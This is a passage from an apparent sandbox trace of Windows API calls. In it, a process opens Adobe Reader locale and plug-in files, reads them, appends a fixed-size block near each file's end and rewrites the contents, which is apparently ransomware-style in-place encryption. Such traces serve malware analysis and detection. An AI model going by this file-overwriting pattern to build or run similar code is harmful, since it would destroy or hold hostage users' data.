lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4dc00 [0082.150] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.150] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.150] ReleaseMutex (hMutex=0x168) returned 1 [0082.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.CHS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0082.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.CHS", cchWideChar=11, lpMultiByteStr=0x1f7342c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.CHS", lpUsedDefaultChar=0x0) returned 11 [0082.150] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0082.161] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4cc00 [0082.161] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.171] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4cc00 [0082.171] WriteFile (in: hFile=0x1d8, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.172] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0082.172] WriteFile (in: hFile=0x1d8, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0082.173] CloseHandle (hObject=0x1d8) returned 1 [0082.173] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0082.174] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.174] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe4 [0082.174] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.174] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.174] ReleaseMutex (hMutex=0x168) returned 1 [0082.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.174] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0082.174] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ee5ff8, nNumberOfBytesToRead=0xe4, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee5ff8*, lpNumberOfBytesRead=0x2b1f2bc*=0xe4, lpOverlapped=0x0) returned 1 [0082.176] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0082.176] WriteFile (in: hFile=0x1d8, lpBuffer=0x2692e08*, nNumberOfBytesToWrite=0x66c, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2692e08*, lpNumberOfBytesWritten=0x2b1f2d0*=0x66c, lpOverlapped=0x0) returned 1 [0082.176] CloseHandle (hObject=0x1d8) returned 1 [0082.176] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\BRdlang32.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\brdlang32.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0082.177] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.177] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1e00 [0082.177] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.177] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.177] ReleaseMutex (hMutex=0x168) returned 1 [0082.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.CHT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0082.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.CHT", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.CHT", lpUsedDefaultChar=0x0) returned 13 [0082.177] ReadFile (in: hFile=0x1d8, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x2b1f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0082.185] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0082.186] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a6078*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a6078*, lpNumberOfBytesWritten=0x2b1f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0082.186] CloseHandle (hObject=0x1d8) returned 1 [0082.187] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Multimedia.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\multimedia.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0082.187] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.187] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xda00 [0082.187] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.187] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.188] ReleaseMutex (hMutex=0x168) returned 1 [0082.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.CHT", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0082.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.CHT", cchWideChar=14, lpMultiByteStr=0x1f7358c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.CHT", lpUsedDefaultChar=0x0) returned 14 [0082.188] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0082.200] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xca00 [0082.200] ReadFile (in: hFile=0x1d8, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.208] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xca00 [0082.208] WriteFile (in: hFile=0x1d8, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.208] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0082.208] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0082.209] CloseHandle (hObject=0x1d8) returned 1 [0082.209] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\SendMail.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\sendmail.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.213] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.213] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2e00 [0082.213] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.213] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.213] ReleaseMutex (hMutex=0x168) returned 1 [0082.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.CHT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.CHT", cchWideChar=12, lpMultiByteStr=0x1f733cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.CHT", lpUsedDefaultChar=0x0) returned 12 [0082.214] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.215] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1e00 [0082.215] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.693] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1e00 [0082.694] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.694] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0082.694] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.695] CloseHandle (hObject=0x1e4) returned 1 [0082.695] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\adobepdf.xdc" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\adobepdf.xdc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.696] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.696] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb36f [0082.696] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.696] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.696] ReleaseMutex (hMutex=0x168) returned 1 [0082.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adobepdf.xdc", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="adobepdf.xdc", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="adobepdf.xdc", lpUsedDefaultChar=0x0) returned 12 [0082.696] ReadFile (in: hFile=0x1e4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0082.698] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa36f [0082.698] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.699] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa36f [0082.699] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.699] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0082.700] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0082.700] CloseHandle (hObject=0x1e4) returned 1 [0082.700] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DigSig.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\digsig.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.701] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.701] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x15de63 [0082.701] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.701] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.701] ReleaseMutex (hMutex=0x168) returned 1 [0082.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.api", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0082.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.api", cchWideChar=10, lpMultiByteStr=0x1f733cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.api", lpUsedDefaultChar=0x0) returned 10 [0082.701] ReadFile (in: hFile=0x1e4, lpBuffer=0x2882db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0082.704] ReadFile (in: hFile=0x1e4, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.705] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x15ce63 [0082.705] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0082.707] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x15ce63 [0082.708] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0082.708] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0082.708] WriteFile (in: hFile=0x1e4, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0082.710] WriteFile (in: hFile=0x1e4, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0082.710] CloseHandle (hObject=0x1e4) returned 1 [0082.710] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.712] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.712] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa00 [0082.712] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.712] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.713] ReleaseMutex (hMutex=0x168) returned 1 [0082.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.CHT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0082.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.CHT", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.CHT", lpUsedDefaultChar=0x0) returned 9 [0082.713] ReadFile (in: hFile=0x1e4, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2b1f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0082.715] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0082.715] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0082.715] CloseHandle (hObject=0x1e4) returned 1 [0082.715] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0082.716] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.716] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xa00 [0082.717] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0082.717] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0082.717] ReleaseMutex (hMutex=0x168) returned 1 [0082.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.KOR", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0082.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.KOR", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 